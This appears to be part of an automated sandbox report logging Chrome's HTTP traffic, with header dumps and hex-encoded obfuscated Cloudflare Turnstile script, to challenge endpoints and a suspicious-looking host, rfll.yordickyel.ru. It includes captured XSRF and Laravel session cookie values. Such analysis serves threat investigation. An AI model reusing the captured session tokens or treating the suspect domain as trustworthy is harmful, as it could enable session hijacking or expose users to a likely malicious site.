                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 2c 69 3d 7b 27 54 75 71 6c 77 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 28 29 7d 2c 27 59 57 57 42 56 27 3a 67 58 28 31 35 31 38 29 2c 27 7a 4f 44 54 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 7d 2c 6a 3d 64 5b 67 58 28 31 32 30 36 29 5d 28 29 2c 6b 3d 67 58 28 31 32 36 31 29 2c 69 5b 67 58 28 35 36 38 29 5d 28 6a 5b 67 58 28 33 38 35 29 5d 28 6b 29 2c 2d 31 29 29 3f 65 4d 5b 67 58 28 37 37 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 59 29 7b 67 59 3d 67 58 2c 69 5b 67 59 28 39 39 36 29 5d 21 3d 3d 67 59 28 36 33 39 29 3f 65 4d 5b 67 59 28 31 33 30 37 29 5d 28 29 3a 28 69 5b 67 59 28 36 32 38 29 5d 28 66 29 2c 67 28 67 59 28 31 30 32 33 29 2c 67 59 28 31 30 39 35 29 29 2c 68 28 29 29 7d 2c 31
                                                                  Data Ascii: ,i={'Tuqlw':function(n){return n()},'YWWBV':gX(1518),'zODTf':function(n,o){return n>o}},j=d[gX(1206)](),k=gX(1261),i[gX(568)](j[gX(385)](k),-1))?eM[gX(777)](function(gY){gY=gX,i[gY(996)]!==gY(639)?eM[gY(1307)]():(i[gY(628)](f),g(gY(1023),gY(1095)),h())},1
                                                                  2025-01-13 21:52:30 UTC1369INData Raw: 35 29 5d 3d 21 5b 5d 2c 66 55 5b 67 4a 28 32 36 37 29 5d 3d 65 57 2c 66 55 5b 67 4a 28 38 32 32 29 5d 3d 66 49 2c 66 55 5b 67 4a 28 31 33 34 31 29 5d 3d 66 4e 2c 66 55 5b 67 4a 28 39 36 33 29 5d 3d 66 4f 2c 66 55 5b 67 4a 28 31 36 31 34 29 5d 3d 66 4a 2c 66 55 5b 67 4a 28 33 32 32 29 5d 3d 66 50 2c 66 55 5b 67 4a 28 39 39 33 29 5d 3d 66 4d 2c 66 55 5b 67 4a 28 32 36 36 29 5d 3d 66 4c 2c 66 55 5b 67 4a 28 35 36 31 29 5d 3d 66 61 2c 66 55 5b 67 4a 28 33 33 39 29 5d 3d 66 48 2c 66 55 5b 67 4a 28 38 35 32 29 5d 3d 66 47 2c 66 55 5b 67 4a 28 31 31 36 33 29 5d 3d 66 31 2c 66 55 5b 67 4a 28 31 33 35 33 29 5d 3d 66 32 2c 66 55 5b 67 4a 28 31 33 38 38 29 5d 3d 66 6f 2c 66 55 5b 67 4a 28 34 38 33 29 5d 3d 66 71 2c 66 55 5b 67 4a 28 37 30 37 29 5d 3d 66 70 2c 66 55
                                                                  Data Ascii: 5)]=![],fU[gJ(267)]=eW,fU[gJ(822)]=fI,fU[gJ(1341)]=fN,fU[gJ(963)]=fO,fU[gJ(1614)]=fJ,fU[gJ(322)]=fP,fU[gJ(993)]=fM,fU[gJ(266)]=fL,fU[gJ(561)]=fa,fU[gJ(339)]=fH,fU[gJ(852)]=fG,fU[gJ(1163)]=f1,fU[gJ(1353)]=f2,fU[gJ(1388)]=fo,fU[gJ(483)]=fq,fU[gJ(707)]=fp,fU


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.449766104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:30 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:30 UTC240INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:30 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  cache-control: max-age=2629800, public
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d1f48500ca6-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:30 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.449751104.21.92.2104435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:30 UTC1319OUTGET /favicon.ico HTTP/1.1
                                                                  Host: rfll.yordickyel.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://rfll.yordickyel.ru/16E/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6ImRzRFZ2cUx3cWpFSHFxaFQ0SlVDVEE9PSIsInZhbHVlIjoiSkYrQ05wR3JlZy85QUFNTWIyT2N2SlBVZWdjaHEvTzdIYjRmaXEwTzNiUWRjaHpJMzRuWFZ6THBSblhZOS9NcHA5VXh3dDNqY3FXd1h2OEJVMk84Mm1hdHVhMG9xU1p5bmpPckxoRUVvSWVTWXlCZGdQNlRDYmhJbzFRN2tIbEciLCJtYWMiOiI5ODE2NmY4N2VjZWFkNTkxM2NhM2I1NzFkOWNkMmYzYmRmMTZlMzVkM2FhZjJhYzdiZTIyZjYzZGNjNjZiNDFmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ijl3UExJZU5NR2hMMWhyWldBL0xyQXc9PSIsInZhbHVlIjoiYmNKMXZSOVFnVGhjTlNLL3Q3NnI4ZWh5dWRnbXBHOThFUWxMWWtBTXdWRjM2TmVYR2RPWWUxdFh0TzdkRTh4eUszRzlTaHdQcHV6aTdBNkVRMi9sOXROOHRFOEp6WTBZN1RMdnpsN0l4MUVTRSs2clB5VW9nUlFpVGpRL2YzMVAiLCJtYWMiOiI2ZWI3YmVjN2U1NzVkYzg3MWRmNzg4ZTdiZGMxMWM4ZTljMWJkZTZmZGYxOWQ4NGI5ZGQ5NTM2ZTM2YzUwN2ExIiwidGFnIjoiIn0%3D
                                                                  2025-01-13 21:52:30 UTC1075INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:52:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkFnTH2Fgy%2FvJWwLVTdDXa%2FiDVhGvJM2fqAW1%2BIVns4v6HetFP7TV%2F4ou5RIJjPS1Vcumero%2FHv0DyrZf3swgXUJnzQgCzYt1qNXP3pRCTKLR0vQfU1luF17%2FXqqsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=73177&min_rtt=73058&rtt_var=27481&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1322&delivery_rate=38982&cwnd=220&unsent_bytes=0&cid=cadd1f4161b23913&ts=383&x=0"
                                                                  CF-Cache-Status: HIT
                                                                  Age: 607
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d1f3f880f80-EWR
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1507&rtt_var=575&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1897&delivery_rate=1886304&cwnd=207&unsent_bytes=0&cid=25b6de931678e9db&ts=4079&x=0"
                                                                  2025-01-13 21:52:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.449768104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:30 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90189d18db7dc411&lang=auto HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:31 UTC331INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:31 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 120825
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d21f8804366-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:31 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61
                                                                  Data Ascii: ly%20submitted","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20a
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 2c 66 56 2c 67 37 2c 67 64 2c 67 65 2c 67 66 2c 67 70 2c 67 41 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 34 37 33 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 38 35 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 36 35 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 38 35 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 30 37 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 31 33 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 37 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67
                                                                  Data Ascii: ,fV,g7,gd,ge,gf,gp,gA,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(473))/1+-parseInt(gI(585))/2*(-parseInt(gI(1265))/3)+-parseInt(gI(385))/4*(parseInt(gI(1507))/5)+-parseInt(gI(1613))/6*(parseInt(gI(597))/7)+parseInt(g
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 43 5d 2c 45 3d 66 6b 28 67 2c 68 2c 44 29 2c 6f 5b 68 6e 28 31 32 33 39 29 5d 28 42 2c 45 29 3f 28 46 3d 27 73 27 3d 3d 3d 45 26 26 21 67 5b 68 6e 28 31 34 35 36 29 5d 28 68 5b 44 5d 29 2c 68 6e 28 37 30 38 29 3d 3d 3d 69 2b 44 3f 6f 5b 68 6e 28 33 35 33 29 5d 28 73 2c 6f 5b 68 6e 28 31 32 31 38 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 6f 5b 68 6e 28 31 33 33 36 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 6d 29 7b 68 6d 3d 62 2c 4f 62 6a 65 63 74 5b 68 6d 28 31 36 33 33 29 5d 5b 68 6d 28 39 37 36 29 5d 5b 68 6d 28 38 32 38 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 6d 28 35 37 34 29 5d 28 47 29 7d 7d 2c
                                                                  Data Ascii: C],E=fk(g,h,D),o[hn(1239)](B,E)?(F='s'===E&&!g[hn(1456)](h[D]),hn(708)===i+D?o[hn(353)](s,o[hn(1218)](i,D),E):F||s(i+D,h[D])):o[hn(1336)](s,i+D,E),C++);return j;function s(G,H,hm){hm=b,Object[hm(1633)][hm(976)][hm(828)](j,H)||(j[H]=[]),j[H][hm(574)](G)}},
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 51 51 50 44 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 41 6b 63 7a 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 73 42 4c 6a 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 69 65 4f 59 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 75 72 78 67 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 6f 56 57 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 7a 65 4d 74 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b
                                                                  Data Ascii: function(h,i){return h-i},'QQPDM':function(h,i){return h|i},'AkczQ':function(h,i){return h<<i},'sBLjr':function(h,i){return i==h},'ieOYx':function(h,i){return h-i},'urxgE':function(h,i){return h(i)},'xoVWt':function(h,i){return h<i},'zeMtR':function(h,i){
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 2c 68 58 2c 6a 2c 6b 2c 6c 29 7b 69 66 28 68 58 3d 68 57 2c 68 58 28 33 33 38 29 3d 3d 3d 68 58 28 31 35 30 33 29 29 28 6a 3d 42 5b 43 5d 2c 6b 3d 44 28 45 2c 46 2c 6a 29 2c 47 28 6b 29 29 3f 28 6c 3d 64 5b 68 58 28 31 32 39 34 29 5d 28 27 73 27 2c 6b 29 26 26 21 52 5b 68 58 28 31 34 35 36 29 5d 28 53 5b 6a 5d 29 2c 64 5b 68 58 28 31 32 39 34 29 5d 28 64 5b 68 58 28 31 37 35 35 29 5d 2c 54 2b 6a 29 3f 55 28 56 2b 6a 2c 6b 29 3a 6c 7c 7c 57 28 58 2b 6a 2c 59 5b 6a 5d 29 29 3a 50 28 51 2b 6a 2c 6b 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 68 59 29 7b 72 65 74 75 72 6e 20 68 59 3d 68 58 2c 64 5b 68 59 28 37 30 30 29 5d 5b 68 59 28 35 31 34 29 5d 28 6a 29 7d 29 7d 2c 27
                                                                  Data Ascii: ,hX,j,k,l){if(hX=hW,hX(338)===hX(1503))(j=B[C],k=D(E,F,j),G(k))?(l=d[hX(1294)]('s',k)&&!R[hX(1456)](S[j]),d[hX(1294)](d[hX(1755)],T+j)?U(V+j,k):l||W(X+j,Y[j])):P(Q+j,k);else return null==h?'':f.g(h,6,function(j,hY){return hY=hX,d[hY(700)][hY(514)](j)})},'
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 5d 28 49 2c 31 29 7c 31 2e 31 38 26 4e 2c 64 5b 68 5a 28 31 31 39 39 29 5d 28 4a 2c 64 5b 68 5a 28 31 36 33 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 5a 28 35 37 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 45 3d 3d 30 26 26 28 45 3d 4d 61 74 68 5b 68 5a 28 34 39 34 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 7b 69 66 28 73 5b 68 5a 28 31 34 31 37 29 5d 28 69 5b 68 5a 28 31 37 38 30 29 5d 2c 34 29 29 72 65 74 75 72 6e 3b 69 66 28 6a 5b 68 5a 28 31 35 34 33 29 5d 21 3d 32 30 30 26 26 73 5b 68 5a 28 31 34 31 37 29 5d 28 4b 5b 68 5a 28 31 35 34 33 29 5d 2c 33 30 34 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 73 5b 68 5a 28 31 31 38 34 29 5d 28 6f
                                                                  Data Ascii: ](I,1)|1.18&N,d[hZ(1199)](J,d[hZ(1630)](j,1))?(J=0,H[hZ(574)](o(I)),I=0):J++,N>>=1,x++);}E--,E==0&&(E=Math[hZ(494)](2,G),G++),delete C[D]}else{if(s[hZ(1417)](i[hZ(1780)],4))return;if(j[hZ(1543)]!=200&&s[hZ(1417)](K[hZ(1543)],304))return void s[hZ(1184)](o
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 68 5a 28 33 33 30 29 5d 28 64 5b 68 5a 28 31 33 31 32 29 5d 28 49 2c 31 29 2c 31 26 4e 29 2c 4a 3d 3d 64 5b 68 5a 28 35 30 34 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 5a 28 35 37 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 68 5a 28 31 34 39 39 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 68 5a 28 34 39 34 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 68 5a 28 36 32 35 29 5d 28 78 2c 47 29 3b 49 3d 49 3c 3c 31 7c 64 5b 68 5a 28 35 35 35 29 5d 28 4e 2c 31 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 68 5a 28 35 37 34 29 5d 28 64 5b 68 5a 28
                                                                  Data Ascii: ,x=0;16>x;I=d[hZ(330)](d[hZ(1312)](I,1),1&N),J==d[hZ(504)](j,1)?(J=0,H[hZ(574)](o(I)),I=0):J++,N>>=1,x++);}E--,d[hZ(1499)](0,E)&&(E=Math[hZ(494)](2,G),G++),delete C[D]}else for(N=B[D],x=0;d[hZ(625)](x,G);I=I<<1|d[hZ(555)](N,1),j-1==J?(J=0,H[hZ(574)](d[hZ(
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 64 5b 69 34 28 38 37 34 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 34 28 34 39 34 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 34 28 31 31 32 37 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 69 34 28 31 31 31 32 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 69 34 28 35 37 34 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 64 5b 69 34 28 38 39 31 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b
                                                                  Data Ascii: d[i4(874)](0,N)?1:0,F),F<<=1);O=e(J);break;case 1:for(J=0,K=Math[i4(494)](2,16),F=1;F!=K;N=G&H,H>>=1,H==0&&(H=j,G=d[i4(1127)](o,I++)),J|=(0<N?1:0)*F,F<<=1);O=d[i4(1112)](e,J);break;case 2:return''}for(E=s[3]=O,D[i4(574)](O);;){if(d[i4(891)](I,i))return'';
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 6b 5b 69 35 28 37 30 33 29 5d 28 27 27 29 7d 2c 65 4d 5b 67 4a 28 35 37 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 37 2c 64 2c 65 2c 66 2c 67 29 7b 69 37 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 69 37 28 31 33 37 31 29 5d 3d 69 37 28 31 36 37 30 29 2c 64 5b 69 37 28 38 38 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 65 5b 69 37 28 38 38 37 29 5d 28 31 65 33 2c 65 4d 5b 69 37 28 38 37 39 29 5d 5b 69 37 28 31 35 32 34 29 5d 28 32 3c 3c 66 2c 33 32 29 29 2c 65 4d 5b 69 37 28 39 30 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 38 29 7b 69 38 3d 69 37 2c 65 4d 5b 69 38 28 31 35 32 39 29 5d 26 26 28 65 4d 5b 69 38 28 31 31 34 38 29 5d 5b 69 38 28 38 31 33 29 5d 28 29 2c 65 4d 5b 69 38 28 31 31 34 38
                                                                  Data Ascii: k[i5(703)]('')},eM[gJ(579)]=function(i7,d,e,f,g){i7=gJ,d={},d[i7(1371)]=i7(1670),d[i7(887)]=function(h,i){return i*h},e=d,f=1,g=e[i7(887)](1e3,eM[i7(879)][i7(1524)](2<<f,32)),eM[i7(904)](function(i8){i8=i7,eM[i8(1529)]&&(eM[i8(1148)][i8(813)](),eM[i8(1148


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.449769104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:31 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 3179
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
